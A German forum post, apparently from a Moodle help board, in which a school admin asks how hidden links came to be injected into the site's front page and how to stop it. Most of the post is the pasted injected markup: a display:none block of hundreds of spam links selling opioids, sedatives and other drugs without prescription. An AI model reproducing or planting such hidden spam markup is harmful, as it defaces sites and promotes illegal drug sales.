versteckte Werbelinks - ggf. schlimmeres - auf Startseite eingeschleust

versteckte Werbelinks - ggf. schlimmeres - auf Startseite eingeschleust

von Steffen Auer -
Anzahl Antworten: 12
Hallo,

ich hatte vor einiger Zeit zufällig entdeckt, dass in unserem Moodle 1.9.4+ auf der Startseite - und nur auf dieser - im Quellcode unzählige Zeilen mit Links zu Viagra und was weiß ich was allem aufgetaucht sind.
Ich habe dann auf 1.9.5+ geupdated und der Code war weg. Gerade habe ich wieder mal nachgeschaut, und es ist schon wieder eine Unmenge Code eingeschleust (siehe unten).
Open to Google ist aktiviert
Anmeldung ist nur per Authorisierung über den LDAP unseres Schulservers möglich.
Moodle-Admin Passwort ist denke ich sicher gewählt
FTP-Passwort ist ebenfalls sehr sicher - beide sind nur mir bekannt.

Neben dem Ändern der Passwörter für Admin und FTP und Abschalten von Open to Google:
1. Was kann ich tun, um den Code zu entfernen (Wo muss ich suchen)?
2. Auf welchem Weg könnte die Einschleusung erfolgen - und wie kann ich das dauerhaft verhindern?

Ach ja - der PC, von dem ich administriere, ist nur mir zugänglich und immer mit aktueller Internetsecurity geschützt.

MfG
Steffen

und nun der eingeschleuste Code:

<!-- google53263563763 --><u style='display:none'>
<a href="http://profiles.tigweb.org/Soma1">Buy Soma online no prescription</a>
<a href="http://profiles.tigweb.org/tramadol1">Buy Tramadol online no prescription</a>
<a href="http://profiles.tigweb.org/Xanax1">Buy Xanax online no prescription</a>
<a href="http://profiles.tigweb.org/Vicodin1">Buy Vcodin online no prescription</a>
<a href="http://profiles.tigweb.org/Ultram1">Buy Ultram online no prescription</a>
<a href="http://profiles.tigweb.org/viagra1">Buy Viagra online no prescription</a>
<a href="http://profiles.tigweb.org/Adipex1">Buy Adipex online no prescription</a>
<a href="http://profiles.tigweb.org/Ambien1">Buy Ambien online no prescription</a>
<a href="http://profiles.tigweb.org/Fioricet1">Buy Fioricet online no prescription</a>
<a href="http://profiles.tigweb.org/Propecia1">Buy Propecia online no prescription</a>
<a href="http://profiles.tigweb.org/Prozac1">Buy Prozac online no prescription</a>
<a href="http://profiles.tigweb.org/phentermine1">Buy Phentermine online no prescription</a>
<a href="http://profiles.tigweb.org/oxycodone1">Buy Oxycodone online no prescription</a>
<a href="http://profiles.tigweb.org/Accutane1">Buy Accutane online no prescription</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Propecia-online-Purchase-cheap-Propecia-/251163">Buy Propecia online, Purchase cheap Propecia!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Nexium-online-Purchase-cheap-Nexium-/251162"> Buy Nexium online, Purchase cheap Nexium!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Lexapro-online-Purchase-cheap-Lexapro-/251161"> Buy Lexapro online, Purchase cheap Lexapro!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-hydrocodone-online-Purchase-cheap-hydrocodone-/251160"> Buy hydrocodone online, Purchase cheap hydrocodone!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Fioricet-online-Purchase-cheap-Fioricet-/251158">Buy Fioricet online, Purchase cheap Fioricet!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Accutane-online-Purchase-cheap-Accutane-/251156">Buy Accutane online, Purchase cheap Accutane!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Viagra-online-Purchase-cheap-Viagra-/251154">Buy Viagra online, Purchase cheap Viagra!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Xanax-online-Purchase-cheap-Xanax-/251153">Buy Xanax online, Purchase cheap Xanax!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Tramadol-online-Purchase-cheap-Tramadol-/251151">Buy Tramadol online, Purchase cheap Tramadol!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Soma-online-Purchase-cheap-Soma-/251150">Buy Soma online, Purchase cheap Soma!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Phentermine-online-Purchase-cheap-Phentermine-/251149">Buy Phentermine online, Purchase cheap Phentermine!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Ultram-online-Purchase-cheap-Ultram-/251147">Buy Ultram online, Purchase cheap Ultram!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-prednisone-online-Purchase-cheap-prednisone-/251145">Buy prednisone online, Purchase cheap prednisone!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Wellbutrin-online-Purchase-cheap-Wellbutrin-/251144">Buy Wellbutrin online, Purchase cheap Wellbutrin!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Carisoprodol-online-Purchase-cheap-Carisoprodol-/251142">Buy Carisoprodol online, Purchase cheap Carisoprodol!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-testosterone-online-Purchase-cheap-testosterone-/251140">Buy testosterone online, Purchase cheap testosterone!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/-Buy-Adipex-online-Purchase-cheap-Adipex-/251139">Buy Adipex online, Purchase cheap Adipex!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Fosamax-online-Purchase-cheap-Fosamax-/251138">Buy Fosamax online, Purchase cheap Fosamax!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Zoloft-online-Purchase-cheap-Zoloft-/251137">Buy Zoloft online, Purchase cheap Zoloft!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Vicodin-online-Purchase-cheap-Vicodin-/251136">Buy Vicodin online, Purchase cheap Vicodin!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Valium-online-Purchase-cheap-Valium-/251135">Buy Valium online, Purchase cheap Valium!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/-Buy-Trazodone-online-Purchase-cheap-Trazodone-/251134">Buy Trazodone online, Purchase cheap Trazodone!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/-Buy-Percocet-online-Purchase-cheap-Percocet-/251132">Buy Percocet online, Purchase cheap Percocet!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Oxycodone-online-Purchase-cheap-Oxycodone-/251131">Buy Oxycodone online, Purchase cheap Oxycodone!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Norvasc-online-Purchase-cheap-Norvasc-/251130">Buy Norvasc online, Purchase cheap Norvasc!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Neurontin-online-Purchase-cheap-Neurontin-/251129">Buy Neurontin online, Purchase cheap Neurontin!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Diazepam-online-Purchase-cheap-Diazepam-/251128">Buy Diazepam online, Purchase cheap Diazepam!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/-Buy-Ambien-online-Purchase-cheap-Ambien-/251127">Buy Ambien online, Purchase cheap Ambien!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Fioricet-online-Purchase-cheap-Fioricet-/251124">Buy Fioricet online, Purchase cheap Fioricet!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Ativan-online-Purchase-cheap-Ativan-/251123">Buy Ativan online, Purchase cheap Ativan!</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Effexor-no-prescription-needed-Order-Effexor-online/251119">Buy Effexor no prescription needed Order Effexor online</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Fioricet-no-prescription-needed-Order-Fioricet-online-/251118">Buy Fioricet no prescription needed Order Fioricet online</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Cialis-no-prescription-needed-Order-Cialis-online/251114">Buy Cialis no prescription needed Order Cialis online</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Diazepam-no-prescription-needed-Order-Diazepam-online/251113">Diazepam no prescription needed Order Diazepam online</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Topamax-no-prescription-needed-Order-Topamax-online/251111">Buy Topamax no prescription needed Order Topamax online</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/-Buy-Lipitor-no-prescription-needed-Order-Lipitor-online/251110">Buy Lipitor no prescription needed Order Lipitor online</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Tramadol-no-prescription-needed-Order-Tramadol-online/251108">Buy Tramadol no prescription needed Order Tramadol online</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Vicodin-no-prescription-needed-Order-Vicodin-online/251106">Buy Vicodin no prescription needed Order Vicodin online</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Paxil-no-prescription-needed-Order-Paxil-online/251105">Buy Paxil no prescription needed Order Paxil online</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/-Buy-Ultram-no-prescription-needed-Order-Ultram-online/251104">Buy Ultram no prescription needed Order Ultram online</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/-Buy-Viagra-no-prescription-needed-Order-Viagra-online/251103">Buy Viagra no prescription needed Order Viagra online</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Ambien-no-prescription-needed-Order-Ambien-online/251102">Buy Ambien no prescription needed Order Ambien online</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Xanax-no-prescription-needed-Order-Xanax-online/251101">Buy Xanax no prescription needed Order Xanax online</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/-Buy-Soma-no-prescription-needed-Order-Soma-online/251100">Buy Soma no prescription needed Order Soma online</a>
<a href="http://www.merchantcircle.com/blogs/Jonny.258-974-8769/2009/6/Buy-Percocet-no-prescription-Order-Percocet-online/251099">Buy Percocet no prescription Order Percocet online</a>
<a href="http://wcs.csc.uvic.ca/?q=node/217">Buy Fioricet online, Purchase cheap Fioricet!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/218">Buy Abilify online, Purchase cheap Abilify!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/219">Buy Accutane online, Purchase cheap Accutane!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/220">Buy Adderall online, Purchase cheap Adderall!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/221">Buy Adipex online, Purchase cheap Adipex!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/222">Buy Ambien online, Purchase cheap Ambien!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/223">Buy Celebrex online, Purchase cheap Celebrex!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/224">Buy Celexa online, Purchase cheap Celexa!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/225">Buy Chantix online, Purchase cheap Chantix!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/226">Buy Cialis online, Purchase cheap Cialis!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/227">Buy Claritin online, Purchase cheap Claritin!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/228">Buy Cymbalta online, Purchase cheap Cymbalta!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/229">Buy Effexor online, Purchase cheap Effexor!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/230">Buy ephedrine online, Purchase cheap ephedrine!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/231">Buy Femara online, Purchase cheap Femara!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/232">Buy Flomax online, Purchase cheap Flomax!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/233">Buy Fosamax online, Purchase cheap Fosamax!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/234">Buy gabapentin online, Purchase cheap gabapentin!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/235">Buy Hoodia online, Purchase cheap Hoodia!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/236">Buy Carisoprodol online, Purchase cheap Carisoprodol!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/237">Buy hydrocodone online, Purchase cheap hydrocodone!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/238">Buy Keppra online, Purchase cheap Keppra!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/239">Buy Levaquin online, Purchase cheap Levaquin!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/240">Buy Levitra online, Purchase cheap Levitra!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/241">Buy Lexapro online, Purchase cheap Lexapro!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/242">Buy Lipitor online, Purchase cheap Lipitor!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/243">Buy lisinopril online, Purchase cheap lisinopril!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/244">Buy Lyrica online, Purchase cheap Lyrica!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/245">Buy naproxen online, Purchase cheap naproxen!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/246">Buy Neurontin online, Purchase cheap Neurontin!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/247">Buy Nexium online, Purchase cheap Nexium!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/248">Buy Norvasc online, Purchase cheap Norvasc!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/249">Buy oxycodone online, Purchase cheap oxycodone!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/250">Buy oxycontin online, Purchase cheap oxycontin!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/251">Buy Paxil online, Purchase cheap Paxil!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/252">Buy Percocet online, Purchase cheap Percocet!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/253">Buy phentermine online, Purchase cheap phentermine!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/254">Buy prednisone online, Purchase cheap prednisone!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/255">Buy Prevacid online, Purchase cheap Prevacid!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/256">Buy Prilosec online, Purchase cheap Prilosec!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/257">Buy Propecia online, Purchase cheap Propecia!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/258">Buy Protonix online, Purchase cheap Protonix!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/259">Buy Provigil online, Purchase cheap Provigil!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/260">Buy Prozac online, Purchase cheap Prozac!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/261">Buy Singulair online, Purchase cheap Singulair!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/262">Buy Soma online, Purchase cheap Soma!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/263">Buy Suboxone online, Purchase cheap Suboxone!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/264">Buy testosterone online, Purchase cheap testosterone!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/265">Buy Topamax online, Purchase cheap Topamax!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/266">Buy tramadol online, Purchase cheap tramadol!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/267">Buy trazodone online, Purchase cheap trazodone!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/268">Buy Ultram online, Purchase cheap Ultram!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/269">Buy Valtrex online, Purchase cheap Valtrex!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/270">Buy Viagra online, Purchase cheap Viagra!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/271">Buy Vicodin online, Purchase cheap Vicodin!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/272">Buy Wellbutrin online, Purchase cheap Wellbutrin!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/273">Buy Xanax online, Purchase cheap Xanax!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/274">Buy Zoloft online, Purchase cheap Zoloft!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/275">Buy Amoxicillin online, Purchase cheap Amoxicillin!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/276">Buy Atenolol online, Purchase cheap Atenolol!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/277">Buy Ativan online, Purchase cheap Ativan!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/278">Buy Diazepam online, Purchase cheap Diazepam!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/279">Buy Klonopin online, Purchase cheap Klonopin!</a>
<a href="http://wcs.csc.uvic.ca/?q=node/280">Buy Valium online, Purchase cheap Valium!</a>
<a href="http://www.intent.com/mooner88/blog/buy-klonopin-online-purchase-cheap-klonopin">Buy Klonopin online, Purchase cheap Klonopin!</a>
<a href="http://www.intent.com/mooner88/blog/buy-ativan-online-purchase-cheap-ativan">Buy Ativan online, Purchase cheap Ativan!</a>
<a href="http://www.intent.com/mooner88/blog/buy-zoloft-online-purchase-cheap-zoloft">Buy Zoloft online, Purchase cheap Zoloft!</a>
<a href="http://www.intent.com/mooner88/blog/buy-xanax-online-purchase-cheap-xanax">Buy Xanax online, Purchase cheap Xanax!</a>
<a href="http://www.intent.com/mooner88/blog/buy-vicodin-online-purchase-cheap-vicodin">Buy Vicodin online, Purchase cheap Vicodin!</a>
<a href="http://www.intent.com/mooner88/blog/buy-valium-online-purchase-cheap-valium">Buy Valium online, Purchase cheap Valium!</a>
<a href="http://www.intent.com/mooner88/blog/buy-viagra-online-purchase-cheap-viagra">Buy Viagra online, Purchase cheap Viagra!</a>
<a href="http://www.intent.com/mooner88/blog/buy-ultram-online-purchase-cheap-ultram">Buy Ultram online, Purchase cheap Ultram!</a>
<a href="http://www.intent.com/mooner88/blog/buy-trazodone-online-purchase-cheap-trazodone">Buy trazodone online, Purchase cheap trazodone!</a>
<a href="http://www.intent.com/mooner88/blog/buy-tramadol-online-purchase-cheap-tramadol">Buy tramadol online, Purchase cheap tramadol!</a>
<a href="http://www.intent.com/mooner88/blog/buy-topamax-online-purchase-cheap-topamax">Buy Topamax online, Purchase cheap Topamax!</a>
<a href="http://www.intent.com/mooner88/blog/buy-testosterone-online-purchase-cheap-testosterone">Buy testosterone online, Purchase cheap testosterone!</a>
<a href="http://www.intent.com/mooner88/blog/buy-suboxone-online-purchase-cheap-suboxone">Buy Suboxone online, Purchase cheap Suboxone!</a>
<a href="http://www.intent.com/mooner88/blog/buy-soma-online-purchase-cheap-soma">Buy Soma online, Purchase cheap Soma!</a>
<a href="http://www.intent.com/mooner88/blog/buy-prozac-online-purchase-cheap-prozac">Buy Prozac online, Purchase cheap Prozac!</a>
<a href="http://www.intent.com/mooner88/blog/buy-protonix-online-purchase-cheap-protonix">Buy Protonix online, Purchase cheap Protonix!</a>
<a href="http://www.intent.com/mooner88/blog/buy-propecia-online-purchase-cheap-propecia">Buy Propecia online, Purchase cheap Propecia!</a>
<a href="http://www.intent.com/mooner88/blog/buy-prevacid-online-purchase-cheap-prevacid">Buy Prevacid online, Purchase cheap Prevacid!</a>
<a href="http://www.intent.com/mooner88/blog/buy-prednisone-online-purchase-cheap-prednisone">Buy prednisone online, Purchase cheap prednisone!</a>
<a href="http://www.intent.com/mooner88/blog/buy-phentermine-online-purchase-cheap-phentermine">Buy phentermine online, Purchase cheap phentermine!</a>
<a href="http://www.intent.com/mooner88/blog/buy-percocet-online-purchase-cheap-percocet">Buy Percocet online, Purchase cheap Percocet!</a>
<a href="http://www.intent.com/mooner88/blog/buy-paxil-online-purchase-cheap-paxil">Buy Paxil online, Purchase cheap Paxil!</a>
<a href="http://www.intent.com/mooner88/blog/buy-oxycodone-online-purchase-cheap-oxycodone">Buy oxycodone online, Purchase cheap oxycodone!</a>
<a href="http://www.intent.com/mooner88/blog/buy-norvasc-online-purchase-cheap-norvasc">Buy Norvasc online, Purchase cheap Norvasc!</a>
<a href="http://www.intent.com/mooner88/blog/buy-nexium-online-purchase-cheap-nexium">Buy Nexium online, Purchase cheap Nexium!</a>
<a href="http://www.intent.com/mooner88/blog/buy-neurontin-online-purchase-cheap-neurontin">Buy Neurontin online, Purchase cheap Neurontin!</a>
<a href="http://www.intent.com/mooner88/blog/buy-lyrica-online-purchase-cheap-lyrica">Buy Lyrica online, Purchase cheap Lyrica!</a>
<a href="http://www.intent.com/mooner88/blog/buy-lexapro-online-purchase-cheap-lexapro">Buy Lexapro online, Purchase cheap Lexapro!</a>
<a href="http://www.intent.com/mooner88/blog/buy-levitra-online-purchase-cheap-levitra">Buy Levitra online, Purchase cheap Levitra!</a>
<a href="http://www.intent.com/mooner88/blog/buy-hydrocodone-online-purchase-cheap-hydrocodone">Buy hydrocodone online, Purchase cheap hydrocodone!</a>
<a href="http://www.intent.com/mooner88/blog/buy-gabapentin-online-purchase-cheap-gabapentin">Buy gabapentin online, Purchase cheap gabapentin!</a>
<a href="http://www.intent.com/mooner88/blog/buy-fosamax-online-purchase-cheap-fosamax">Buy Fosamax online, Purchase cheap Fosamax!</a>
<a href="http://www.intent.com/mooner88/blog/buy-flomax-online-purchase-cheap-flomax">Buy Flomax online, Purchase cheap Flomax!</a>
<a href="http://www.intent.com/mooner88/blog/buy-femara-online-purchase-cheap-femara">Buy Femara online, Purchase cheap Femara!</a>
<a href="http://www.intent.com/mooner88/blog/buy-ephedrine-online-purchase-cheap-ephedrine">Buy ephedrine online, Purchase cheap ephedrine!</a>
<a href="http://www.intent.com/mooner88/blog/buy-effexor-online-purchase-cheap-effexor">Buy Effexor online, Purchase cheap Effexor!</a>
<a href="http://www.intent.com/mooner88/blog/buy-cymbalta-online-purchase-cheap-cymbalta">Buy Cymbalta online, Purchase cheap Cymbalta!</a>
<a href="http://www.intent.com/mooner88/blog/buy-chantix-online-purchase-cheap-chantix">Buy Chantix online, Purchase cheap Chantix!</a>
<a href="http://www.intent.com/mooner88/blog/buy-celexa-online-purchase-cheap-celexa">Buy Celexa online, Purchase cheap Celexa!</a>
<a href="http://www.intent.com/mooner88/blog/buy-celebrex-online-purchase-cheap-celebrex">Buy Celebrex online, Purchase cheap Celebrex!</a>
<a href="http://www.intent.com/mooner88/blog/buy-accutane-online-purchase-cheap-accutane">Buy Accutane online, Purchase cheap Accutane!</a>
<a href="http://www.intent.com/mooner88/blog/buy-abilify-online-purchase-cheap-abilify">Buy Abilify online, Purchase cheap Abilify!</a>
<a href="http://www.intent.com/mooner88/blog/buy-adipex-online-purchase-cheap-adipex">Buy Adipex online, Purchase cheap Adipex!</a>
<a href="http://www.intent.com/mooner88/blog/buy-ambien-online-purchase-cheap-ambien">Buy Ambien online, Purchase cheap Ambien!</a>
<a href="http://www.intent.com/mooner88/blog/buy-fioricet-online-purchase-cheap-fioricet">Buy Fioricet online, Purchase cheap Fioricet!</a>
<a href="http://www.buymyshitpile.com/node/4206">Buy Soma online, Purchase cheap Soma!</a>
<a href="http://www.buymyshitpile.com/node/4205">Buy Fioricet online, Purchase cheap Fioricet!</a>
<a href="http://www.buymyshitpile.com/node/4207">Buy Abilify online, Purchase cheap Abilify!</a>
<a href="http://www.buymyshitpile.com/node/4208">Buy Accutane online, Purchase cheap Accutane!</a>
<a href="http://www.buymyshitpile.com/node/4209">Buy Adderall online, Purchase cheap Adderall!</a>
<a href="http://www.buymyshitpile.com/node/4210">Buy Adipex online, Purchase cheap Adipex!</a>
<a href="http://www.buymyshitpile.com/node/4211">Buy Ambien online, Purchase cheap Ambien!</a>
<a href="http://www.buymyshitpile.com/node/4212">Buy Celebrex online, Purchase cheap Celebrex!</a>
<a href="http://www.buymyshitpile.com/node/4213">Buy Celexa online, Purchase cheap Celexa!</a>
<a href="http://www.buymyshitpile.com/node/4214">Buy Chantix online, Purchase cheap Chantix!</a>
<a href="http://www.buymyshitpile.com/node/4215">Buy Cialis online, Purchase cheap Cialis!</a>
<a href="http://www.buymyshitpile.com/node/4216">Buy Effexor online, Purchase cheap Effexor!</a>
<a href="http://www.buymyshitpile.com/node/4217">Buy Femara online, Purchase cheap Femara!</a>
<a href="http://www.buymyshitpile.com/node/4218">Buy Fosamax online, Purchase cheap Fosamax!</a>
<a href="http://www.buymyshitpile.com/node/4219">Buy Carisoprodol online, Purchase cheap Carisoprodol!</a>
<a href="http://www.buymyshitpile.com/node/4220">Buy hydrocodone online, Purchase cheap hydrocodone!</a>
<a href="http://www.buymyshitpile.com/node/4221">Buy Levaquin online, Purchase cheap Levaquin!</a>
<a href="http://www.buymyshitpile.com/node/4222">Buy Lexapro online, Purchase cheap Lexapro!</a>
<a href="http://www.buymyshitpile.com/node/4223">Buy naproxen online, Purchase cheap naproxen!</a>
<a href="http://www.buymyshitpile.com/node/4224">Buy Neurontin online, Purchase cheap Neurontin!</a>
<a href="http://www.buymyshitpile.com/node/4225">Buy Nexium online, Purchase cheap Nexium!</a>
<a href="http://www.buymyshitpile.com/node/4226">Buy Norvasc online, Purchase cheap Norvasc!</a>
<a href="http://www.buymyshitpile.com/node/4227">Buy oxycodone online, Purchase cheap oxycodone!</a>
<a href="http://www.buymyshitpile.com/node/4228">Buy Paxil online, Purchase cheap Paxil!</a>
<a href="http://www.buymyshitpile.com/node/4229">Buy Percocet online, Purchase cheap Percocet!</a>
<a href="http://www.buymyshitpile.com/node/4230">Buy phentermine online, Purchase cheap phentermine!</a>
<a href="http://www.buymyshitpile.com/node/4231">Buy prednisone online, Purchase cheap prednisone!</a>
<a href="http://www.buymyshitpile.com/node/4232">Buy Prevacid online, Purchase cheap Prevacid!</a>
<a href="http://www.buymyshitpile.com/node/4233">Buy Prilosec online, Purchase cheap Prilosec!</a>
<a href="http://www.buymyshitpile.com/node/4234">Buy Propecia online, Purchase cheap Propecia!</a>
<a href="http://www.buymyshitpile.com/node/4235">Buy Prozac online, Purchase cheap Prozac!</a>
<a href="http://www.buymyshitpile.com/node/4236">Buy testosterone online, Purchase cheap testosterone!</a>
<a href="http://www.buymyshitpile.com/node/4237">Buy Topamax online, Purchase cheap Topamax!</a>
<a href="http://www.buymyshitpile.com/node/4238">Buy tramadol online, Purchase cheap tramadol!</a>
<a href="http://www.buymyshitpile.com/node/4239">Buy trazodone online, Purchase cheap trazodone!</a>
<a href="http://www.buymyshitpile.com/node/4240">Buy Ultram online, Purchase cheap Ultram!</a>
<a href="http://www.buymyshitpile.com/node/4241">Buy Valtrex online, Purchase cheap Valtrex!</a>
<a href="http://www.buymyshitpile.com/node/4242">Buy Viagra online, Purchase cheap Viagra!</a>
<a href="http://www.buymyshitpile.com/node/4243">Buy Vicodin online, Purchase cheap Vicodin!</a>
<a href="http://www.buymyshitpile.com/node/4244">Buy Wellbutrin online, Purchase cheap Wellbutrin!</a>
<a href="http://www.buymyshitpile.com/node/4245">Buy Xanax online, Purchase cheap Xanax!</a>
<a href="http://www.buymyshitpile.com/node/4246">Buy Zoloft online, Purchase cheap Zoloft!</a>
<a href="http://www.buymyshitpile.com/node/4247">Buy Atenolol online, Purchase cheap Atenolol!</a>
<a href="http://www.buymyshitpile.com/node/4248">Buy Ativan online, Purchase cheap Ativan!</a>
<a href="http://www.buymyshitpile.com/node/4249">Buy Valium online, Purchase cheap Valium!</a>
<a href="http://forums.about.com/n/pfx/forum.aspx?tsn=1&nav=messages&webtag=ab-skateboard&tid=7563">Buy Paxil no perscription cod</a>
<a href="http://forums.about.com/n/pfx/forum.aspx?tsn=1&nav=messages&webtag=ab-skateboard&tid=7564">Buy Soma no perscription cod</a>
<a href="http://forums.about.com/n/pfx/forum.aspx?tsn=1&nav=messages&webtag=ab-skateboard&tid=7565">Buy Viagra no perscription cod</a>
<a href="http://forums.about.com/n/pfx/forum.aspx?tsn=1&nav=messages&webtag=ab-skateboard&tid=7566">Buy Vicodin no perscription cod</a>
<a href="http://forums.about.com/n/pfx/forum.aspx?tsn=1&nav=messages&webtag=ab-skateboard&tid=7567">Buy Xanax no perscription cod</a>
<a href="http://forums.about.com/n/pfx/forum.aspx?tsn=1&nav=messages&webtag=ab-skateboard&tid=7568">Buy Cialis no perscription cod</a>
<a href="http://forums.about.com/n/pfx/forum.aspx?tsn=1&nav=messages&webtag=ab-skateboard&tid=7569">Buy Nexium no perscription cod</a>
<a href="http://forums.about.com/n/pfx/forum.aspx?tsn=1&nav=messages&webtag=ab-skateboard&tid=7570">Buy Norvasc no perscription cod</a>
<a href="http://forums.about.com/n/pfx/forum.aspx?tsn=1&nav=messages&webtag=ab-skateboard&tid=7571">Buy Percocet no perscription cod</a>
<a href="http://forums.about.com/n/pfx/forum.aspx?tsn=1&nav=messages&webtag=ab-skateboard&tid=7572">Buy phentermine no perscription cod</a>
<a href="http://forums.about.com/n/pfx/forum.aspx?tsn=1&nav=messages&webtag=ab-skateboard&tid=7573">Buy Adipex no perscription cod</a>
<a href="http://forums.about.com/n/pfx/forum.aspx?tsn=1&nav=messages&webtag=ab-skateboard&tid=7574">Buy Ambien no perscription cod</a>
